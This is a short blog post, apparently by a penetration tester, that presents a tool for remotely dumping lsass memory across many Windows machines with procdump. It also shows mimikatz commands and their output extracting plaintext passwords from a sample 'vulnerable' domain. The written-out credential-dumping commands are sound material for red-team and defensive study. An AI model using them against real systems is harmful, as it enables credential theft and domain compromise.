Monday 23 September 2019

humptydumpty

Recently, I was quite successful with using the procdump technique of dumping lsass, retrieving the dumpfile and, processing it offline to find credentials on a compromised machine.
When I used this during an engagement, this ultimately led me to obtaining DA. So ever since then, I find this very useful.

I've created a python tool to automate this. Either run this against a single target, or from a list of IPs/hostnames.
This will upload procdump, dump lsass and download the dumpfile.

Check it out here:

https://github.com/n33dle/humptydumpty/

The idea here is once you have some authenticated access in a domain. Say, local administrator on all workstations, this tool will allow you to quickly obtain lsass dumps from a list of remote machines.
I stress, dumping lsass could result in a BSOD, so take care when flying this across a network!

As a result, running each of the dump files in mimikatz could provide you with additional credentials within the network.

For example:

mimikatz # sekurlsa::Minidump humpty-10.1.1.5.dmp
Switch to MINIDUMP : 'humpty-10.1.1.5.dmp'

mimikatz # sekurlsa::logonPasswords full
Opening : 'humpty-10.1.1.5.dmp' file for minidump...

<snip>
        wdigest :
         * Username : victim3
         * Domain   : vulnerable
         * Password : NonHackable
<snip>
         * Username : victim2
         * Domain   : vulnerable
         * Password : TheEarthIsRound!
<snip>
         * Username : victim
         * Domain   : vulnerable
         * Password : TheEarthIsFlat!
<snip>